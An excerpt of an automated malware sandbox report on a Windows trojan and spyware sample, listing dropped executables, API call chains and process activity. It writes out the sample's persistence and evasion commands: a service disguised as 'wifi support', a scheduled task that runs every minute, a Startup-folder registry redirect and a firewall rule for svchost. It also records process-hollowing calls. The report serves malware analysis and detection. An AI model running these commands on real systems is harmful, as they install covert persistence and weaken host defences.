                          Source: rifsswe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: rifsswe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: rifsswe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: rifsswe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gecrjwsv.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gecrjwsv.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gecrjwsv.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gecrjwsv.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeSection loaded: mscorjit.dll
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: tijXCZsbGe.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\xzxafeeu\
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCode function: String function: 0041E120 appears 32 times
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: String function: 00632794 appears 35 times
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: String function: 0041E120 appears 32 times
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: String function: 0040EE2A appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: String function: 00402544 appears 53 times
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: String function: 00422DA0 appears 132 times
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: String function: 0041E520 appears 171 times
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: String function: 0041E500 appears 31 times
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: String function: 004048D0 appears 460 times
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00402491 NtOpenKey,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 9_2_00630110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_054BF5C0 NtUnmapViewOfSection,
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_054BF6A0 NtAllocateVirtualMemory,
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                          Source: 9334.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: B0F7.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 5C89.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 8783.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: 9DFA.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: 8783.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: 8783.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: 8783.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: 8783.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: 9DFA.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: 9DFA.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: 9DFA.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: 9DFA.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: C7FA.exe.5.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                          Source: tijXCZsbGe.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rifsswe
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/23@82/18
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeFile read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCode function: 32_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: tijXCZsbGe.exeVirustotal: Detection: 34%
                          Source: tijXCZsbGe.exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\tijXCZsbGe.exe "C:\Users\user\Desktop\tijXCZsbGe.exe"
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeProcess created: C:\Users\user\Desktop\tijXCZsbGe.exe "C:\Users\user\Desktop\tijXCZsbGe.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\rifsswe C:\Users\user\AppData\Roaming\rifsswe
                          Source: C:\Users\user\AppData\Roaming\rifssweProcess created: C:\Users\user\AppData\Roaming\rifsswe C:\Users\user\AppData\Roaming\rifsswe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9334.exe C:\Users\user\AppData\Local\Temp\9334.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 264
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DB31.exe C:\Users\user\AppData\Local\Temp\DB31.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E748.exe C:\Users\user\AppData\Local\Temp\E748.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F65C.exe C:\Users\user\AppData\Local\Temp\F65C.exe
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xzxafeeu\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description xzxafeeu "wifi internet conection
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start xzxafeeu
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d"C:\Users\user\AppData\Local\Temp\E748.exe"
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess created: C:\Users\user\AppData\Local\Temp\F65C.exe C:\Users\user\AppData\Local\Temp\F65C.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5C89.exe C:\Users\user\AppData\Local\Temp\5C89.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6FB4.exe C:\Users\user\AppData\Local\Temp\6FB4.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8783.exe C:\Users\user\AppData\Local\Temp\8783.exe
                          Source: C:\Users\user\AppData\Local\Temp\6FB4.exeProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9DFA.exe C:\Users\user\AppData\Local\Temp\9DFA.exe
                          Source: C:\Users\user\AppData\Local\Temp\8783.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B0F7.exe C:\Users\user\AppData\Local\Temp\B0F7.exe
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeProcess created: C:\Users\user\Desktop\tijXCZsbGe.exe "C:\Users\user\Desktop\tijXCZsbGe.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9334.exe C:\Users\user\AppData\Local\Temp\9334.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DB31.exe C:\Users\user\AppData\Local\Temp\DB31.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E748.exe C:\Users\user\AppData\Local\Temp\E748.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F65C.exe C:\Users\user\AppData\Local\Temp\F65C.exe
                          Source: C:\Users\user\AppData\Roaming\rifssweProcess created: C:\Users\user\AppData\Roaming\rifsswe C:\Users\user\AppData\Roaming\rifsswe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 264
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xzxafeeu\
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description xzxafeeu "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start xzxafeeu
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeProcess created: C:\Users\user\AppData\Local\Temp\F65C.exe C:\Users\user\AppData\Local\Temp\F65C.exe
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9334.tmp
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_00419E0A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,GetPriorityClass,
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4728:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7100
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:4972:64:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_01
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: 0.0
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: hijaduvinijebup
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: mocisacatenu
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: wapejan
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: wovag
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: cbH
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: Piruvora
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: gukafipa
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: mawecamaxe
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: Hiwejanoji
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: Pusazide
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCommand line argument: hukujid
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCommand line argument: cbH
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCommand line argument: cbH
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCommand line argument: cbH
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCommand line argument: cbH
                          Source: F65C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                          Source: 18.0.F65C.exe.ab0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                          Source: 35.0.F65C.exe.4d0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
                          Source: Window Recorder Window detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: tijXCZsbGe.exe Static PE information: More than 200 imports for KERNEL32.dll
                          Source: tijXCZsbGe.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: tijXCZsbGe.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: tijXCZsbGe.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: tijXCZsbGe.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: tijXCZsbGe.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: tijXCZsbGe.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: tijXCZsbGe.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: C:\zazadix dori\kol.pdb source: DB31.exe, 00000010.00000000.772191492.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: 5C89.exe, 00000026.00000003.849959984.00000000030D0000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.987438014.0000000003010000.00000040.00000001.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771517190.0000000004E2A000.00000004.00000001.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: powrprof.pdbL source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
